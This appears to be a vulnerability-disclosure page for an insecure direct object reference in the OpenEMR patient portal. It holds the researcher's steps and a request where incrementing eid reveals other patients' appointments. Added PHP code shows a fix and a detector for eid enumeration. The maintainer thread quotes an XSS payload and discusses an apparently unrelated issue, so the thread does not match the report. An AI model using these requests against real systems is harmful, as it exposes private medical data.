IDOR discloses other users' appointments in openemr/openemr

Valid

Reported on

Jul 25th 2022


Description:

In this case an IDOR allows an attacker to view portal users' appointments.

Proof of Concept

1. Go to http://demo.openemr.io/openemr/portal/home.php and then go to My Profile > My Appointment.
2. Click on the Edit Appointment button and capture the request in Burp Suite.
3. Change the eid parameter to any number.

PoC:

```http
GET https://demo.openemr.io/openemr/portal/add_edit_event_user.php?eid=24
Host: demo.openemr.io
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://demo.openemr.io/openemr/portal/home.php
X-Requested-With: XMLHttpRequest
DNT: 1
Connection: keep-alive
Cookie: PortalOpenEMR=Sessionid
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
Pragma: no-cache
Cache-Control: no-cache
```

Change `eid=24` to 23, 22, 25, etc.

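The defect behind the request above is that the endpoint takes `eid` from the query string and never checks that the appointment belongs to the patient who is logged in. What follows is an added example, not OpenEMR's own code and not the project's actual fix: it shows the vulnerable lookup next to one hardened with an ownership check. The `appointments` table with its `eid`/`pid` columns, the `$session['pid']` layout and all function names are assumptions made for this example.

```php
<?php
// Added example (not OpenEMR's code): the vulnerable pattern behind this report
// next to the ownership check that closes it. Table/column names, the session
// layout and the helper names are assumptions made for this example.

declare(strict_types=1);

// Constructed in-memory database standing in for the portal's appointment store.
function buildSampleDb(): PDO
{
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE appointments (eid INTEGER PRIMARY KEY, pid INTEGER NOT NULL, title TEXT NOT NULL, starts_at TEXT NOT NULL)');
    $ins = $db->prepare('INSERT INTO appointments (eid, pid, title, starts_at) VALUES (?, ?, ?, ?)');
    foreach ([
        [22, 7, 'Follow-up',       '2022-08-01 09:00'],
        [23, 7, 'Lab review',      '2022-08-03 14:00'],
        [24, 9, 'Annual physical', '2022-08-02 10:30'],
        [25, 9, 'Vaccination',     '2022-08-05 11:00'],
    ] as $row) {
        $ins->execute($row);
    }
    return $db;
}

// VULNERABLE: trusts the eid from the query string and never asks who owns it.
// Any authenticated portal user who changes eid sees someone else's appointment.
function loadAppointmentVulnerable(PDO $db, int $eid): ?array
{
    $stmt = $db->prepare('SELECT eid, pid, title, starts_at FROM appointments WHERE eid = ?');
    $stmt->execute([$eid]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// HARDENED: the patient id comes from the server-side session, never from the
// request, and the query itself is scoped to that patient. A row owned by another
// patient and a nonexistent row both yield null, so the endpoint does not confirm
// which eids exist.
function loadAppointmentOwned(PDO $db, int $eid, int $sessionPid): ?array
{
    $stmt = $db->prepare('SELECT eid, pid, title, starts_at FROM appointments WHERE eid = ? AND pid = ?');
    $stmt->execute([$eid, $sessionPid]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Request handler in the shape of a portal page: 404 for anything the caller does not own.
function handleEditEvent(PDO $db, array $session, array $query): array
{
    if (!isset($session['pid'])) {
        return ['status' => 401, 'body' => 'portal login required'];
    }
    $eid = filter_var($query['eid'] ?? '', FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($eid === false) {
        return ['status' => 400, 'body' => 'invalid eid'];
    }
    $row = loadAppointmentOwned($db, $eid, (int) $session['pid']);
    if ($row === null) {
        return ['status' => 404, 'body' => 'appointment not found'];
    }
    return ['status' => 200, 'body' => $row];
}

// Demonstration: patient 7 asks for eid=24, which belongs to patient 9.
$db      = buildSampleDb();
$session = ['pid' => 7];      // set at portal login, server side
$query   = ['eid' => '24'];   // attacker-controlled, taken from the URL

$leaked = loadAppointmentVulnerable($db, 24);
printf("vulnerable: eid=24 -> pid %d's '%s' shown to pid %d\n", $leaked['pid'], $leaked['title'], $session['pid']);

foreach (['24', '23'] as $eid) {
    $resp = handleEditEvent($db, $session, ['eid' => $eid]);
    $what = is_array($resp['body']) ? $resp['body']['title'] : $resp['body'];
    printf("hardened:   eid=%s -> HTTP %d (%s)\n", $eid, $resp['status'], $what);
}
```

Run it with `php idor_fix.php`. Scoping the query by the session's pid (rather than fetching by eid and comparing afterwards) keeps the check in one place where it cannot be skipped, and answering 404 for both missing and foreign rows means a caller learns nothing about which eids exist.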
# Impact

An attacker can view all appointments.
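Because the PoC works by walking neighbouring eid values, one server-side signal worth alerting on is a single portal session requesting many distinct eid values within a short window. The following is an added example, not part of the report and not OpenEMR code; it assumes the access log is extended with the portal session cookie value as its last field (the sample lines are constructed), and the 5-minute window and threshold of 4 are arbitrary choices for the example.

```php
<?php
// Added example (not OpenEMR's code): flag portal sessions that request many
// distinct eid values in a short window, the enumeration pattern in this report.
// The log format (combined log plus the PortalOpenEMR cookie value in the last
// field), the 5-minute window and the threshold of 4 are assumptions.

declare(strict_types=1);

// Constructed sample access-log lines: the first session walks eid 22..26 within
// seconds, the second views one appointment twice, twenty minutes apart.
const SAMPLE_LOG = <<<'LOG'
10.0.0.5 - - [25/Jul/2022:10:00:01 +0000] "GET /openemr/portal/add_edit_event_user.php?eid=24 HTTP/1.1" 200 812 "PortalOpenEMR=abc123"
10.0.0.5 - - [25/Jul/2022:10:00:03 +0000] "GET /openemr/portal/add_edit_event_user.php?eid=23 HTTP/1.1" 200 790 "PortalOpenEMR=abc123"
10.0.0.5 - - [25/Jul/2022:10:00:04 +0000] "GET /openemr/portal/add_edit_event_user.php?eid=22 HTTP/1.1" 200 801 "PortalOpenEMR=abc123"
10.0.0.5 - - [25/Jul/2022:10:00:06 +0000] "GET /openemr/portal/add_edit_event_user.php?eid=25 HTTP/1.1" 200 799 "PortalOpenEMR=abc123"
10.0.0.5 - - [25/Jul/2022:10:00:07 +0000] "GET /openemr/portal/add_edit_event_user.php?eid=26 HTTP/1.1" 200 805 "PortalOpenEMR=abc123"
10.0.0.9 - - [25/Jul/2022:10:01:10 +0000] "GET /openemr/portal/add_edit_event_user.php?eid=31 HTTP/1.1" 200 811 "PortalOpenEMR=def456"
10.0.0.9 - - [25/Jul/2022:10:20:15 +0000] "GET /openemr/portal/add_edit_event_user.php?eid=31 HTTP/1.1" 200 811 "PortalOpenEMR=def456"
LOG;

// Only requests to the appointment endpoint are of interest; capture time, eid and session.
const LINE_PATTERN = '~^(\S+) \S+ \S+ \[([^\]]+)\] "GET /openemr/portal/add_edit_event_user\.php\?eid=(\d+)[^"]*" \d+ \d+ "PortalOpenEMR=([^"]+)"~';

/**
 * Returns [sessionId => max distinct eids seen inside one window] for every
 * session that reached the threshold; sessions below it are absent.
 */
function findEnumeratingSessions(string $log, int $windowSeconds = 300, int $threshold = 4): array
{
    $bySession = [];
    foreach (preg_split('/\R/', trim($log)) as $line) {
        if (!preg_match(LINE_PATTERN, $line, $m)) {
            continue; // not a request to the appointment endpoint
        }
        $ts = DateTimeImmutable::createFromFormat('d/M/Y:H:i:s O', $m[2]);
        if ($ts === false) {
            continue; // unparsable timestamp, skip the line
        }
        $bySession[$m[4]][] = ['t' => $ts->getTimestamp(), 'eid' => (int) $m[3]];
    }

    $alerts = [];
    foreach ($bySession as $session => $events) {
        usort($events, fn(array $a, array $b): int => $a['t'] <=> $b['t']);
        $inWindow = []; // eid => number of requests for it inside the current window
        $start = 0;
        foreach ($events as $ev) {
            $inWindow[$ev['eid']] = ($inWindow[$ev['eid']] ?? 0) + 1;
            // Slide the window: drop requests older than windowSeconds before this one.
            while ($events[$start]['t'] < $ev['t'] - $windowSeconds) {
                $old = $events[$start]['eid'];
                if (--$inWindow[$old] === 0) {
                    unset($inWindow[$old]);
                }
                $start++;
            }
            $distinct = count($inWindow);
            if ($distinct >= $threshold) {
                $alerts[$session] = max($alerts[$session] ?? 0, $distinct);
            }
        }
    }
    return $alerts;
}

$alerts = findEnumeratingSessions(SAMPLE_LOG);
if ($alerts === []) {
    echo "no enumeration detected\n";
}
foreach ($alerts as $session => $distinct) {
    printf("ALERT session %s requested %d distinct eids within 5 minutes\n", $session, $distinct);
}
```

On the sample above only session `abc123` is reported (5 distinct eids in six seconds). Keying on the session rather than the client IP matters here because the page itself is the vulnerable one: a single logged-in account iterating ids is exactly the case the ownership check, not rate limiting, must ultimately stop, and the alert is there to tell you it happened on instances not yet patched.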
We are processing your report and will contact the openemr team within 24 hours. 10 months ago
We have contacted a member of the openemr team and are waiting to hear back 9 months ago
We have sent a follow up to the openemr team. We will try again in 7 days. 9 months ago
Brady Miller
9 months ago

Maintainer


Hi @Distorted_Hacker, I was unable to confirm this. I used the same portal demo link in step 1 above and entered Phil"><img src=x onerror=prompt(2)> into the First name field (in My Profile) in step 2. Step 3 is a bit confusing since one can't go to a direct link like that (I ended up needing to log into openemr at https://demo.openemr.io/openemr for step 3; also unclear if you meant to have a discrepancy in http in step 1 and then https in step 3).

Brady Miller
9 months ago

Maintainer


Used the wrong name on the above message; meant for this to go to @gaurav-g2.

Distorted_Hacker
9 months ago

Researcher


Hi @bradymiller, after the 2nd step we have to log in as admin in the 3rd step and then visit the portal audits section; here the admin will receive a 401 error and cannot access the portal audit section.

Distorted_Hacker
9 months ago

Researcher


Sorry, I mean in the 3rd step we have to log in as admin, and in the 1st and 2nd steps log in as patient.

stephen waite
9 months ago

Maintainer


Unable to reproduce this morning @gaurav-g2 at https://demo.openemr.io/openemr/interface/login/login.php?site=default, can you try again please? Thank you.

stephen waite
9 months ago

Maintainer


This happens when you are logged into the openemr portal and the openemr app in the same browser session; once you log out of the portal the access is restored.

We have sent a second follow up to the openemr team. We will try again in 10 days. 9 months ago
Distorted_Hacker modified the report
9 months ago
Distorted_Hacker
9 months ago

Researcher


Hi @bradymiller, check out the new update.

We have sent a third and final follow up to the openemr team. This report is now considered stale. 9 months ago
stephen waite validated this vulnerability 9 months ago

Thanks for the report. A preliminary fix has been posted in commit 86c1c443e0643eed82e2a66da4573fb71f73cbcd

Please do not create a CVE # or make this vulnerability public at this time. We will make this fix official about 1 week after we release 7.0.0 patch 2 (7.0.0.2), which will likely be in about 1-3 weeks. After we do that, it will be ok to make a CVE # and make it public.

Thanks!

Distorted_Hacker has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
We have sent a fix follow up to the openemr team. We will try again in 7 days. 9 months ago
We have sent a second fix follow up to the openemr team. We will try again in 10 days. 9 months ago
We have sent a third and final fix follow up to the openemr team. This report is now considered stale. 8 months ago
Brady Miller marked this as fixed in 7.0.0.2 with commit 235b19 7 months ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
Brady Miller published this vulnerability 5 months ago
Brady Miller
5 months ago

Maintainer


@admin, please assign a CVE. thanks!
